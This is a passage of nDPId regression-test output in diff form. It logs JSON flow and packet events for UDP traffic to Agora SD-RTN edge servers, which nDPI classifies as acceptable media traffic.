+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649099059734,"flow_last_seen":1649099059780,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3162,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098909723,"flow_last_seen":1649098909909,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3103,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1649336894950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894950,"pkt":"eJS0JASgYDjgxTWgCABFoAEHIDxAAD8RRqHAqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1649336894951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894951,"pkt":"eJS0JASgYDjgxTWgCABFoAEHID1AAD8RRqDAqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1649336894951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894951,"pkt":"eJS0JASgYDjgxTWgCABFoAEHID5AAD8RRp\/AqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsfxAAD8R0PjAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsf1AAD8R0PfAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsf5AAD8R0PbAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1649336954948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954948,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wlAAD8RUlDAqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1649336954948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954948,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wpAAD8RUk\/AqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1649336954949,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954949,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wtAAD8RUk7AqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1649336960165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpW5AAD8R\/yDAqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1649336960166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpW9AAD8R\/x\/AqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1649336960166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpXBAAD8R\/x7AqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndlAAD8Rl4HAqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndpAAD8Rl4DAqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndtAAD8Rl3\/AqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 